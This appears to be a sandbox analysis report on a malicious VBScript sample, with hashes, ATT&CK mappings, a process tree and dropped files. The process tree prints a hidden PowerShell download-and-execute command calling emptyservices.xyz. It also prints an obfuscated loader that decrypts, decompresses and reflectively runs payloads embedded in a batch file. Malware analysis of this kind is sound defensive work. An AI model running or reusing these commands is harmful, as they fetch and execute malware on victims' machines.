6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff

General

Target

6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff.vbs
Size

78KB
MD5

870907ad00a8f53e022f042c92727d34
SHA1

8789f00e533da9b0a8bd380b9264cfaefe8ff7bc
SHA256

6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff
SHA512

32fbacd4338eced63990c4e0f7327fc3fc4282d497e95724445476f42acf8c1378238d345e5ba53afe86e39d860643657523b42cc5982832162e75cd7d68cde1
SSDEEP

1536:KbiY5vZc5xg80mnBAH5JQGnDc3GiXs/P0Uese0A+giS5+p:giUvQYONp3Gi8/PW0Ats

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2316	powershell.exe
2672	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2316	powershell.exe
2672	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2484 wrote to memory of 2316	2484	WScript.exe	30
PID 2484 wrote to memory of 2316	2484	WScript.exe	30
PID 2484 wrote to memory of 2316	2484	WScript.exe	30
PID 2484 wrote to memory of 2748	2484	WScript.exe	33
PID 2484 wrote to memory of 2748	2484	WScript.exe	33
PID 2484 wrote to memory of 2748	2484	WScript.exe	33
PID 2748 wrote to memory of 2760	2748	cmd.exe	35
PID 2748 wrote to memory of 2760	2748	cmd.exe	35
PID 2748 wrote to memory of 2760	2748	cmd.exe	35
PID 2748 wrote to memory of 2672	2748	cmd.exe	36
PID 2748 wrote to memory of 2672	2748	cmd.exe	36
PID 2748 wrote to memory of 2672	2748	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
70KB

MD5
b5d7889efc929af61649d13f17bf26ad

SHA1
44b1bb834ad5b3566dd4c758995bbedb2c2ba6b6

SHA256
3490b5a8d583c702b69506a047fc21135758b8dde44d77b9d102c3e4d4a4de01

SHA512
193db0b92d1595c8cfd3ecb31dd8cc2a23e3701319418a1b465bf0bc87c2708aedcd49b099bd6fe202bcca7a24f3df9bb792280abe95dce535e32f2f7ade4c3b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
05fef18fd281edbf7fc9079d3810ec0b

SHA1
25c9c123837027551c1a45922a25d74fc91206cb

SHA256
26ead89b22d8f63320b1c1bf36fa1e0f5e448e44236e52188d1d20c18570b113

SHA512
c7c6808ff6b0bba471d77270dad7293310e7e126e3961ba1ca9b0942efc8f9b60e8ec3b3933a18cbb6aaab6f8ecf45968bd1e691546aa78ddee3dc2acbaa65fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T5C7K1JYXUH7QV91G786.temp

Filesize
7KB

MD5
c5e2fc7f095c26a393ab6af4ff9f28e7

SHA1
c280c57b862cbd67761053fae0216669ff2a80f0

SHA256
803572eaf2367220ef6df872ca92fd11ed71bc14d7495b9115f1014f06e901d2

SHA512
20a2198dc35a3fa57d5df8923acce7ff47f1570a08c55306d315f86320cb1120f0b86c949d82a66b32439f9b9e3973c4837e3279872dd9f65bdc2efbfde02c5d

Download Submit
memory/2316-8-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-7-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/2316-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2316-11-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

Filesize
4KB

Download
memory/2316-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-9-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/2672-27-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2672-28-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing